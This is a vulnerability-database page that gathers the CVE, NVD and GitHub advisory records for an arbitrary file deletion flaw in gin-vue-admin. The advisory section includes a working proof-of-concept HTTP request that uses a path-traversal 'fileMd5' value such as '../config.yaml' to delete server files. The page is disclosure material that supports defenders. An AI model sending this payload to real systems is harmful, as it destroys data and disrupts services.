CVE-2025-66410 (GCVE-0-2025-66410)
Vulnerability from cvelistv5 – Published: 2025-12-01 22:28 – Updated: 2025-12-02 14:12
VLAI?
Summary
Gin-vue-admin is a backstage management system based on vue and gin. In 2.8.6 and earlier, attackers can delete any file on the server at will, causing damage or unavailability of server resources. Attackers can control the 'FileMd5' parameter to delete any file and folder.
Severity ?
CWE
- CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| flipped-aurora | gin-vue-admin |
Affected:
<= 2.8.6
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-66410",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-12-02T14:11:58.721578Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-12-02T14:12:10.529Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "gin-vue-admin",
"vendor": "flipped-aurora",
"versions": [
{
"status": "affected",
"version": "\u003c= 2.8.6"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Gin-vue-admin is a backstage management system based on vue and gin. In 2.8.6 and earlier, attackers can delete any file on the server at will, causing damage or unavailability of server resources. Attackers can control the \u0027FileMd5\u0027 parameter to delete any file and folder."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "HIGH"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-12-01T22:28:59.982Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/flipped-aurora/gin-vue-admin/security/advisories/GHSA-jrhg-82w2-vvj7",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/flipped-aurora/gin-vue-admin/security/advisories/GHSA-jrhg-82w2-vvj7"
},
{
"name": "https://github.com/flipped-aurora/gin-vue-admin/commit/ee8d8d7e04d9c38a35a6969f20e75213e84f57c6",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/flipped-aurora/gin-vue-admin/commit/ee8d8d7e04d9c38a35a6969f20e75213e84f57c6"
}
],
"source": {
"advisory": "GHSA-jrhg-82w2-vvj7",
"discovery": "UNKNOWN"
},
"title": "Gin-vue-admin has an arbitrary file deletion vulnerability"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-66410",
"datePublished": "2025-12-01T22:28:59.982Z",
"dateReserved": "2025-11-28T23:33:56.365Z",
"dateUpdated": "2025-12-02T14:12:10.529Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-66410\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-12-01T23:15:53.730\",\"lastModified\":\"2025-12-02T17:16:29.163\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Gin-vue-admin is a backstage management system based on vue and gin. In 2.8.6 and earlier, attackers can delete any file on the server at will, causing damage or unavailability of server resources. Attackers can control the \u0027FileMd5\u0027 parameter to delete any file and folder.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":8.7,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"NONE\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"}]}],\"references\":[{\"url\":\"https://github.com/flipped-aurora/gin-vue-admin/commit/ee8d8d7e04d9c38a35a6969f20e75213e84f57c6\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/flipped-aurora/gin-vue-admin/security/advisories/GHSA-jrhg-82w2-vvj7\",\"source\":\"security-advisories@github.com\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-66410\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-12-02T14:11:58.721578Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-12-02T14:12:06.265Z\"}}], \"cna\": {\"title\": \"Gin-vue-admin has an arbitrary file deletion vulnerability\", \"source\": {\"advisory\": \"GHSA-jrhg-82w2-vvj7\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 8.7, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"flipped-aurora\", \"product\": \"gin-vue-admin\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c= 2.8.6\"}]}], \"references\": [{\"url\": \"https://github.com/flipped-aurora/gin-vue-admin/security/advisories/GHSA-jrhg-82w2-vvj7\", \"name\": \"https://github.com/flipped-aurora/gin-vue-admin/security/advisories/GHSA-jrhg-82w2-vvj7\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/flipped-aurora/gin-vue-admin/commit/ee8d8d7e04d9c38a35a6969f20e75213e84f57c6\", \"name\": \"https://github.com/flipped-aurora/gin-vue-admin/commit/ee8d8d7e04d9c38a35a6969f20e75213e84f57c6\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Gin-vue-admin is a backstage management system based on vue and gin. In 2.8.6 and earlier, attackers can delete any file on the server at will, causing damage or unavailability of server resources. Attackers can control the \u0027FileMd5\u0027 parameter to delete any file and folder.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-22\", \"description\": \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-12-01T22:28:59.982Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-66410\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-12-02T14:12:10.529Z\", \"dateReserved\": \"2025-11-28T23:33:56.365Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-12-01T22:28:59.982Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2025-66410
Vulnerability from fkie_nvd - Published: 2025-12-01 23:15 - Updated: 2025-12-02 17:16
Severity ?
Summary
Gin-vue-admin is a backstage management system based on vue and gin. In 2.8.6 and earlier, attackers can delete any file on the server at will, causing damage or unavailability of server resources. Attackers can control the 'FileMd5' parameter to delete any file and folder.
References
Impacted products
| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Gin-vue-admin is a backstage management system based on vue and gin. In 2.8.6 and earlier, attackers can delete any file on the server at will, causing damage or unavailability of server resources. Attackers can control the \u0027FileMd5\u0027 parameter to delete any file and folder."
}
],
"id": "CVE-2025-66410",
"lastModified": "2025-12-02T17:16:29.163",
"metrics": {
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2025-12-01T23:15:53.730",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/flipped-aurora/gin-vue-admin/commit/ee8d8d7e04d9c38a35a6969f20e75213e84f57c6"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/flipped-aurora/gin-vue-admin/security/advisories/GHSA-jrhg-82w2-vvj7"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Awaiting Analysis",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-22"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
GHSA-JRHG-82W2-VVJ7
Vulnerability from github – Published: 2025-12-02 01:08 – Updated: 2025-12-02 01:08
VLAI?
Summary
Gin-vue-admin has an arbitrary file deletion vulnerability
Details
Impact
Attackers can delete any file on the server at will, causing damage or unavailability of server resources. Attackers can control the 'FileMd5' parameter to delete any file and folder
The affected code:
Affected interfaces: /api/fileUploadAndDownload/removeChunk
POC: You can specify the FileMd5 value as the directory or file you want to delete
```POST /api/fileUploadAndDownload/removeChunk HTTP/1.1 Host: 127.0.0.1:8080 Content-Length: 78 sec-ch-ua: "Not=A?Brand";v="99", "Chromium";v="118" x-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVVUlEIjoiOGYzYTdjMmMtYjAwMC00ODFmLWEyNGYtYzQyMDc2NTFjNWRmIiwiSUQiOjEsIlVzZXJuYW1lIjoiYWRtaW4iLCJOaWNrTmFtZSI6Ik1yLuWlh-a3vCIsIkF1dGhvcml0eUlkIjo4ODgsIkJ1ZmZlclRpbWUiOjg2NDAwLCJpc3MiOiJxbVBsdXMiLCJhdWQiOlsiR1ZBIl0sImV4cCI6MTc2MzIxNDQzMywibmJmIjoxNzYyNjA5NjMzfQ.7BTnRq65JDiPdlb0gJuAUa2nifIDTtePsnDnAtZoFJQ sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36 Content-Type: application/json Accept: application/json, text/plain, / x-user-id: 1 sec-ch-ua-platform: "Windows" Origin: http://127.0.0.1:8080 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://127.0.0.1:8080/ Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: x-token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVVUlEIjoiOGYzYTdjMmMtYjAwMC00ODFmLWEyNGYtYzQyMDc2NTFjNWRmIiwiSUQiOjEsIlVzZXJuYW1lIjoiYWRtaW4iLCJOaWNrTmFtZSI6Ik1yLuWlh-a3vCIsIkF1dGhvcml0eUlkIjo4ODgsIkJ1ZmZlclRpbWUiOjg2NDAwLCJpc3MiOiJxbVBsdXMiLCJhdWQiOlsiR1ZBIl0sImV4cCI6MTc2MzIxNDQzMywibmJmIjoxNzYyNjA5NjMzfQ.7BTnRq65JDiPdlb0gJuAUa2nifIDTtePsnDnAtZoFJQ Connection: close
{"fileName":"ceshi.jpg","fileMd5":"../config.yaml","filePath":"./fileDir/ceshi.jpg"}
```
Patches
Please wait for the latest patch
References
https://github.com/flipped-aurora/gin-vue-admin
Severity ?
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/flipped-aurora/gin-vue-admin"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.9.1-0.20251201084432-ee8d8d7e04d9"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-66410"
],
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-02T01:08:48Z",
"nvd_published_at": "2025-12-01T23:15:53Z",
"severity": "HIGH"
},
"details": "### Impact\nAttackers can delete any file on the server at will, causing damage or unavailability of server resources. Attackers can control the \u0027FileMd5\u0027 parameter to delete any file and folder\n\n The affected code:\n\n\nAffected interfaces:\n/api/fileUploadAndDownload/removeChunk\n\n\nPOC:\nYou can specify the FileMd5 value as the directory or file you want to delete\n\n```POST /api/fileUploadAndDownload/removeChunk HTTP/1.1\nHost: 127.0.0.1:8080\nContent-Length: 78\nsec-ch-ua: \"Not=A?Brand\";v=\"99\", \"Chromium\";v=\"118\"\nx-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVVUlEIjoiOGYzYTdjMmMtYjAwMC00ODFmLWEyNGYtYzQyMDc2NTFjNWRmIiwiSUQiOjEsIlVzZXJuYW1lIjoiYWRtaW4iLCJOaWNrTmFtZSI6Ik1yLuWlh-a3vCIsIkF1dGhvcml0eUlkIjo4ODgsIkJ1ZmZlclRpbWUiOjg2NDAwLCJpc3MiOiJxbVBsdXMiLCJhdWQiOlsiR1ZBIl0sImV4cCI6MTc2MzIxNDQzMywibmJmIjoxNzYyNjA5NjMzfQ.7BTnRq65JDiPdlb0gJuAUa2nifIDTtePsnDnAtZoFJQ\nsec-ch-ua-mobile: ?0\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36\nContent-Type: application/json\nAccept: application/json, text/plain, */*\nx-user-id: 1\nsec-ch-ua-platform: \"Windows\"\nOrigin: http://127.0.0.1:8080\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nReferer: http://127.0.0.1:8080/\nAccept-Encoding: gzip, deflate, br\nAccept-Language: zh-CN,zh;q=0.9\nCookie: x-token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVVUlEIjoiOGYzYTdjMmMtYjAwMC00ODFmLWEyNGYtYzQyMDc2NTFjNWRmIiwiSUQiOjEsIlVzZXJuYW1lIjoiYWRtaW4iLCJOaWNrTmFtZSI6Ik1yLuWlh-a3vCIsIkF1dGhvcml0eUlkIjo4ODgsIkJ1ZmZlclRpbWUiOjg2NDAwLCJpc3MiOiJxbVBsdXMiLCJhdWQiOlsiR1ZBIl0sImV4cCI6MTc2MzIxNDQzMywibmJmIjoxNzYyNjA5NjMzfQ.7BTnRq65JDiPdlb0gJuAUa2nifIDTtePsnDnAtZoFJQ\nConnection: close\n\n{\"fileName\":\"ceshi.jpg\",\"fileMd5\":\"../config.yaml\",\"filePath\":\"./fileDir/ceshi.jpg\"}\n```\n\n\n### Patches\nPlease wait for the latest patch\n\n### References\nhttps://github.com/flipped-aurora/gin-vue-admin",
"id": "GHSA-jrhg-82w2-vvj7",
"modified": "2025-12-02T01:08:48Z",
"published": "2025-12-02T01:08:48Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/flipped-aurora/gin-vue-admin/security/advisories/GHSA-jrhg-82w2-vvj7"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66410"
},
{
"type": "WEB",
"url": "https://github.com/flipped-aurora/gin-vue-admin/commit/ee8d8d7e04d9c38a35a6969f20e75213e84f57c6"
},
{
"type": "PACKAGE",
"url": "https://github.com/flipped-aurora/gin-vue-admin"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Gin-vue-admin has an arbitrary file deletion vulnerability"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…